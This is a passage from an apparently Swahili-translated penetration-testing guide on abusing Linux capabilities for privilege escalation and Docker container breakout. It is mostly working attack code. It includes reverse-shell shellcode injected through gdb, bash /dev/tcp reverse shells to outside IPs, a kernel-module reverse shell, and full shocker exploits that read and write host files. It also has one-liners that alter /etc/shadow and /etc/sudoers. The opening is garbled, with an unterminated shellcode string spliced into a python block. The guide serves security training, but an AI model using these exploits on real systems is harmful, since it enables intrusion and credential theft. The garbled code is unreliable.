4. Mara tu programu inapopakia kwenye gdb, tumia amri ifuatayo kuingiza shellcode kwenye kumbukumbu:

   ```
   set {unsigned char *}0x<Anwani ya kumbukumbu> = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
```python
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
buf =  b""
buf += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
buf += b"\x48\x97\x48\xb9\x02\x00\x23\x29\x0a\x0a\x0e\x0b"
buf += b"\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
buf += b"\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
buf += b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
buf += b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
buf += b"\x0f\x05"

# Divisible by 8
payload = b"\x90" * (8 - len(buf) % 8 ) + buf

# Change endianess and print gdb lines to load the shellcode in RIP directly
for i in range(0, len(buf), 8):
chunk = payload[i:i+8][::-1]
chunks = "0x"
for byte in chunk:
chunks += f"{byte:02x}"

print(f"set {{long}}($rip+{i}) = {chunks}")
```
Chunguza kwa kina mchakato wa mizizi na gdb na nakili na ubandike mistari ya gdb iliyotengenezwa hapo awali:

```bash
$ gdb -p <pid>
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) catch exec
(gdb) run
```

```bash
$ gdb -p <pid>
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) catch exec
(gdb) run
```
```bash
# In this case there was a sleep run by root
## NOTE that the process you abuse will die after the shellcode
/usr/bin/gdb -p $(pgrep sleep)
[...]
(gdb) set {long}($rip+0) = 0x296a909090909090
(gdb) set {long}($rip+8) = 0x5e016a5f026a9958
(gdb) set {long}($rip+16) = 0x0002b9489748050f
(gdb) set {long}($rip+24) = 0x48510b0e0a0a2923
(gdb) set {long}($rip+32) = 0x582a6a5a106ae689
(gdb) set {long}($rip+40) = 0xceff485e036a050f
(gdb) set {long}($rip+48) = 0x6af675050f58216a
(gdb) set {long}($rip+56) = 0x69622fbb4899583b
(gdb) set {long}($rip+64) = 0x8948530068732f6e
(gdb) set {long}($rip+72) = 0x050fe689485752e7
(gdb) c
Continuing.
process 207009 is executing new program: /usr/bin/dash
[...]
```
**Mfano na mazingira (Docker breakout) - Matumizi mengine ya gdb**

Ikiwa **GDB** imefungwa (au unaweza kuifunga kwa kutumia `apk add gdb` au `apt install gdb` kwa mfano), unaweza **kudebugi mchakato kutoka kwenye mwenyeji** na kumfanya aite kazi ya `system`. (Mbinu hii pia inahitaji uwezo wa `SYS_ADMIN`).
```bash
gdb -p 1234
(gdb) call (void)system("ls")
(gdb) call (void)system("sleep 5")
(gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'")
```
Hutaweza kuona matokeo ya amri iliyotekelezwa lakini itatekelezwa na mchakato huo (hivyo pata rev shell).

{% hint style="warning" %}
Ikiwa unapata kosa "Hakuna ishara "system" katika muktadha wa sasa." angalia mfano uliopita wa kupakia shellcode katika programu kupitia gdb.
{% endhint %}

**Mfano na mazingira (Docker breakout) - Uingizaji wa Shellcode**

Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
```bash
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root
```
Orodhesha **mchakato** unaofanya kazi kwenye **mwenyeji** `ps -eaf`

1. Pata **usanifu** `uname -m`
2. Tafuta **shellcode** kwa usanifu ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128))
3. Tafuta **programu** ya **kuingiza** **shellcode** kwenye kumbukumbu ya mchakato ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c))
4. **Badilisha** shellcode ndani ya programu na **itafsiri** `gcc inject.c -o inject`
5. **Ingiza** na pata **shell** yako: `./inject 299; nc 172.17.0.1 5600`

## CAP\_SYS\_MODULE

**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** inawezesha mchakato kufanya **upakiaji na uondolewaji wa moduli za kernel (`init_module(2)`, `finit_module(2)` na `delete_module(2)` wito wa mfumo)**, ikitoa ufikiaji moja kwa moja kwa shughuli za msingi za kernel. Uwezo huu unaweka hatari kubwa ya usalama, kwani inawezesha kuongeza mamlaka na kuhatarisha mfumo mzima kwa kuruhusu mabadiliko kwenye kernel, hivyo kukiuka taratibu zote za usalama za Linux, ikiwa ni pamoja na Moduli za Usalama za Linux na kizuizi cha kontena.
**Hii inamaanisha kuwa unaweza** **kuweka/kuondoa moduli za kernel kwenye mashine ya mwenyeji.**

**Mfano na binary**

Katika mfano ufuatao, binary **`python`** ina uwezo huu.
```bash
getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_module+ep
```
Kwa chaguo-msingi, amri ya **`modprobe`** inachunguza orodha ya utegemezi na faili za ramani katika saraka **`/lib/modules/$(uname -r)`**.\
Ili kutumia hili vibaya, hebu tujenge saraka bandia ya **lib/modules**:
```bash
mkdir lib/modules -p
cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r)
```
Kisha **kamilisha moduli ya kernel unaweza kupata mifano 2 hapa chini na nakili** kwenye folda hii:
```bash
cp reverse-shell.ko lib/modules/$(uname -r)/
```
Hatimaye, tekeleza msimbo wa python unaohitajika ili kupakia kifurushi hiki cha kernel:
```python
import kmod
km = kmod.Kmod()
km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
km.modprobe("reverse-shell")
```
**Mfano 2 na binary**

Katika mfano ufuatao binary **`kmod`** ina uwezo huu.
```bash
getcap -r / 2>/dev/null
/bin/kmod = cap_sys_module+ep
```
Hii inamaanisha kwamba ni rahisi kutumia amri **`insmod`** kuweka moduli ya kernel. Fuata mfano hapa chini ili kupata **shell ya nyuma** kwa kutumia mamlaka haya.

**Mfano na mazingira (Docker breakout)**

Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
```bash
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
```
Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa **SYS\_MODULE** umewezeshwa.

**Tengeneza** **moduli ya kernel** ambayo itatekeleza kitanzi cha kurudisha na **Makefile** ya **kuikusanya**:

{% code title="reverse-shell.c" %}
```c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
```
{% code title="Makefile" %}
```bash
obj-m +=reverse-shell.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```
{% endcode %}

{% hint style="warning" %}
Neno tupu kabla ya kila neno la kufanya katika faili ya Kufanya **lazima iwe tab, sio nafasi**!
{% endhint %}

Tumia `fanya` ili kuikusanya.
```
ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory.  Stop.

sudo apt update
sudo apt full-upgrade
```
Hatimaye, anza `nc` ndani ya kikao na **pakiwa moduli** kutoka kikao kingine na utapata kikao katika mchakato wa nc:
```bash
#Shell 1
nc -lvnp 4444

#Shell 2
insmod reverse-shell.ko #Launch the reverse shell
```
**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing SYS\_MODULE Capability" kutoka** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)

Mfano mwingine wa mbinu hii unaweza kupatikana katika [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)

## CAP\_DAC\_READ\_SEARCH

[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inawezesha mchakato kukiuka ruhusa za kusoma faili na kusoma na kutekeleza saraka. Matumizi yake kuu ni kwa ajili ya utafutaji wa faili au kusoma. Walakini, pia inaruhusu mchakato kutumia kazi ya `open_by_handle_at(2)`, ambayo inaweza kupata faili yoyote, ikiwa ni pamoja na zile nje ya kipekee cha mchakato. Kipekee kinachotumiwa katika `open_by_handle_at(2)` kinapaswa kuwa kitambulisho kisichoweza kuonekana kupitia `name_to_handle_at(2)`, lakini inaweza kujumuisha habari nyeti kama nambari za inode ambazo zinaweza kudukuliwa. Uwezekano wa kutumia uwezo huu, haswa katika muktadha wa vyombo vya Docker, ulidhihirishwa na Sebastian Krahmer na shambulio la shocker, kama ilivyoainishwa [hapa](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3).
**Hii inamaanisha kuwa unaweza kukiuka ukaguzi wa ruhusa za kusoma faili na ukaguzi wa ruhusa za kusoma/utekelezaji wa saraka.**

**Mfano na faili ya binary**

Faili ya binary itaweza kusoma faili yoyote. Kwa hivyo, ikiwa faili kama tar ina uwezo huu, itaweza kusoma faili ya shadow:
```bash
cd /etc
tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp
cd /tmp
tar -cxf shadow.tar.gz
```
**Mfano na binary2**

Katika kesi hii, fikiria kuwa kuna uwezo huu kwenye binary ya **`python`**. Ili kuorodhesha faili za mizizi, unaweza kufanya yafuatayo:
```python
import os
for r, d, f in os.walk('/root'):
for filename in f:
print(filename)
```
Na ili kusoma faili unaweza kufanya:
```python
print(open("/etc/shadow", "r").read())
```
**Mfano katika Mazingira (Docker breakout)**

Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
```
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
```
Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa **DAC\_READ\_SEARCH** umewezeshwa. Kama matokeo, chombo kinaweza **kuchunguza michakato**.

Unaweza kujifunza jinsi mbinu ifuatayo inavyofanya kazi katika [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) lakini kwa muhtasari **CAP\_DAC\_READ\_SEARCH** sio tu inaturuhusu kupitia mfumo wa faili bila ukaguzi wa idhini, lakini pia inaondoa wazi ukaguzi wowote kwa _**open\_by\_handle\_at(2)**_ na **inaweza kuruhusu michakato yetu kufikia faili nyeti zilizofunguliwa na michakato mingine**.

Mbinu ya awali ambayo inatumia uwezo huu kusoma faili kutoka kwenye mwenyeji inaweza kupatikana hapa: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), ifuatayo ni **toleo lililobadilishwa ambalo linakuwezesha kuonyesha faili unayotaka kusoma kama hoja ya kwanza na kuiweka kwenye faili.**
```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>

// gcc shocker.c -o shocker
// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir

struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};

void die(const char *msg)
{
perror(msg);
exit(errno);
}

void dump_handle(const struct my_file_handle *h)
{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}

int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle
*oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}

++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}

fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}


int main(int argc,char* argv[] )
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};

fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");

read(0, buf, 1);

// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");

if (find_handle(fd1, argv[1], &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");

fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);

if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");

memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");

printf("Success!!\n");

FILE *fptr;
fptr = fopen(argv[2], "w");
fprintf(fptr,"%s", buf);
fclose(fptr);

close(fd2); close(fd1);

return 0;
}
```
{% hint style="warning" %}
Exploit hii inahitaji kupata pointer kwa kitu kilichomount kwenye mwenyeji. Exploit ya awali ilikuwa inatumia faili /.dockerinit na toleo lililobadilishwa linatumia /etc/hostname. Ikiwa exploit haifanyi kazi, labda unahitaji kuweka faili tofauti. Ili kupata faili ambayo imemount kwenye mwenyeji, tuendeshe amri ya mount:
{% endhint %}

![](<../../.gitbook/assets/image (407) (1).png>)

**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing DAC\_READ\_SEARCH Capability" kutoka** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)


<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Spain** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

## CAP\_DAC\_OVERRIDE

**Hii inamaanisha kuwa unaweza kuepuka ukaguzi wa ruhusa ya kuandika kwenye faili yoyote, hivyo unaweza kuandika faili yoyote.**

Kuna faili nyingi unazoweza **kuandika upya ili kuongeza mamlaka,** [**unaweza kupata wazo kutoka hapa**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).

**Mfano na binary**

Katika mfano huu, vim ina uwezo huu, hivyo unaweza kubadilisha faili yoyote kama _passwd_, _sudoers_ au _shadow_:
```bash
getcap -r / 2>/dev/null
/usr/bin/vim = cap_dac_override+ep

vim /etc/sudoers #To overwrite it
```
**Mfano na faili ya 2**

Katika mfano huu, faili ya **`python`** itakuwa na uwezo huu. Unaweza kutumia python kubadilisha faili yoyote:
```python
file=open("/etc/sudoers","a")
file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
file.close()
```
**Mfano na mazingira + CAP_DAC_READ_SEARCH (Docker breakout)**

Unaweza kuangalia uwezo uliowezeshwa ndani ya chombo cha docker kwa kutumia:
```bash
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
```
Kwanza soma sehemu iliyotangulia ambayo [**inatumia uwezo wa DAC\_READ\_SEARCH kusoma faili za aina yoyote**](linux-capabilities.md#cap\_dac\_read\_search) ya mwenyeji na **kuchakata** shambulio.\
Kisha, **chakata toleo lifuatalo la shambulio la shocker** ambalo litakuruhusu **kuandika faili za aina yoyote** ndani ya mfumo wa faili wa mwenyeji:
```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>

// gcc shocker_write.c -o shocker_write
// ./shocker_write /etc/passwd passwd

struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char * msg) {
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle * h) {
fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes,
h -> handle_type);
for (int i = 0; i < h -> handle_bytes; ++i) {
fprintf(stderr, "0x%02x", h -> f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr, "\n");
if (i < h -> handle_bytes - 1)
fprintf(stderr, ", ");
}
fprintf(stderr, "};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR * dir = NULL;
struct dirent * de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));
oh -> handle_type = 1;
oh -> handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de -> d_name);
if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino);
ino = de -> d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, & ino, sizeof(ino));
memcpy(outh.f_handle + 4, & i, sizeof(i));
if ((i % (1 << 20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i);
if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle( & outh);
return find_handle(bfd, path, & outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}
int main(int argc, char * argv[]) {
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {
0x02,
0,
0,
0,
0,
0,
0,
0
}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, argv[1], & root_h, & h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle( & h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)
die("[-] open_by_handle");
char * line = NULL;
size_t len = 0;
FILE * fptr;
ssize_t read;
fptr = fopen(argv[2], "r");
while ((read = getline( & line, & len, fptr)) != -1) {
write(fd2, line, read);
}
printf("Success!!\n");
close(fd2);
close(fd1);
return 0;
}
```
Ili kutoroka kwenye kontena ya docker unaweza **kupakua** faili `/etc/shadow` na `/etc/passwd` kutoka kwenye mwenyeji, **kuongeza** mtumiaji **mpya**, na kutumia **`shocker_write`** kuwafuta. Kisha, **fikia** kupitia **ssh**.

**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing DAC\_OVERRIDE Capability" kutoka** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)

## CAP\_CHOWN

**Hii inamaanisha kuwa niwezekana kubadilisha umiliki wa faili yoyote.**

**Mfano na binary**

Tuchukulie kuwa binary ya **`python`** ina uwezo huu, unaweza **kubadilisha** **umiliki** wa faili ya **shadow**, **kubadilisha nenosiri la root**, na kuongeza mamlaka:
```bash
python -c 'import os;os.chown("/etc/shadow",1000,1000)'
```
Au na **`ruby`** binary ikiwa na uwezo huu:
```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```
## CAP\_FOWNER

**Hii inamaanisha kwamba niwezekana kubadilisha ruhusa ya faili yoyote.**

**Mfano na binary**

Ikiwa python ina uwezo huu, unaweza kubadilisha ruhusa ya faili ya kivuli, **kubadilisha nenosiri la root**, na kuongeza mamlaka:
```bash
python -c 'import os;os.chmod("/etc/shadow",0666)
```
### CAP\_SETUID

**Hii inamaanisha kwamba ni rahisi kuweka kitambulisho cha mtumiaji kinachotumika kwenye mchakato ulioundwa.**

**Mfano na faili ya binary**

Ikiwa python ina **uwezo** huu, unaweza kuitumia kwa urahisi kuongeza mamlaka hadi kwenye akaunti ya msimamizi (root):
```python
import os
os.setuid(0)
os.system("/bin/bash")
```
**Njia nyingine:**
```python
import os
import prctl
#add the capability to the effective set
prctl.cap_effective.setuid = True
os.setuid(0)
os.system("/bin/bash")
```
## CAP\_SETGID

**Hii inamaanisha kwamba niwezekana kuweka kitambulisho cha kikundi cha mchakato ulioundwa.**

Kuna faili nyingi unaweza **kubadilisha ili kuongeza mamlaka,** [**unaweza kupata wazo hapa**](payloads-to-execute.md#kubadilisha-faili-ili-kuongeza-mamlaka).

**Mfano na binary**

Katika kesi hii, unapaswa kutafuta faili za kuvutia ambazo kikundi kinaweza kusoma kwa sababu unaweza kujifanya kuwa kikundi chochote:
```bash
#Find every file writable by a group
find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null
```
Marafiki, mara tu utakapopata faili ambayo unaweza kuitumia (kwa kusoma au kuandika) ili kuongeza mamlaka, unaweza **kupata kifaa cha kuingia kwa kujifanya kama kikundi kinachovutia** kwa kutumia:
```python
import os
os.setgid(42)
os.system("/bin/bash")
```
Katika kesi hii, kikundi cha shadow kilijifanya ili uweze kusoma faili `/etc/shadow`:
```bash
cat /etc/shadow
```
Ikiwa **docker** imefungwa, unaweza **kujifanya** kama **kikundi cha docker** na kuitumia vibaya kuwasiliana na [**socket ya docker** na kuongeza mamlaka](./#writable-docker-socket).

## CAP\_SETFCAP

**Hii inamaanisha kuwa ni rahisi kuweka uwezo kwenye faili na michakato**

**Mfano na faili ya binary**

Ikiwa python ina **uwezo** huu, unaweza kuitumia kwa urahisi kuongeza mamlaka hadi kwa mtumiaji mkuu:

{% code title="setcapability.py" %}
```python
import ctypes, sys

#Load needed library
#You can find which library you need to load checking the libraries of local setcap binary
# ldd /sbin/setcap
libcap = ctypes.cdll.LoadLibrary("libcap.so.2")

libcap.cap_from_text.argtypes = [ctypes.c_char_p]
libcap.cap_from_text.restype = ctypes.c_void_p
libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p]

#Give setuid cap to the binary
cap = 'cap_setuid+ep'
path = sys.argv[1]
print(path)
cap_t = libcap.cap_from_text(cap)
status = libcap.cap_set_file(path,cap_t)

if(status == 0):
print (cap + " was successfully added to " + path)
```
{% endcode %}
```bash
python setcapability.py /usr/bin/python2.7
```
{% hint style="warning" %}
Tafadhali kumbuka kuwa ikiwa unaweka uwezo mpya kwa faili ya CAP\_SETFCAP, utapoteza uwezo huu.
{% endhint %}

Marafiki wakati unaweka [uwezo wa SETUID](linux-capabilities.md#cap\_setuid) kwenye faili, unaweza kwenda kwenye sehemu yake kuona jinsi ya kuongeza mamlaka.

**Mfano na mazingira (Docker breakout)**

Kwa chaguo-msingi, uwezo wa **CAP\_SETFCAP unapewa kwa mchakato ndani ya kontena kwenye Docker**. Unaweza kuthibitisha hilo kwa kufanya kitu kama:
```bash
cat /proc/`pidof bash`/status | grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
```
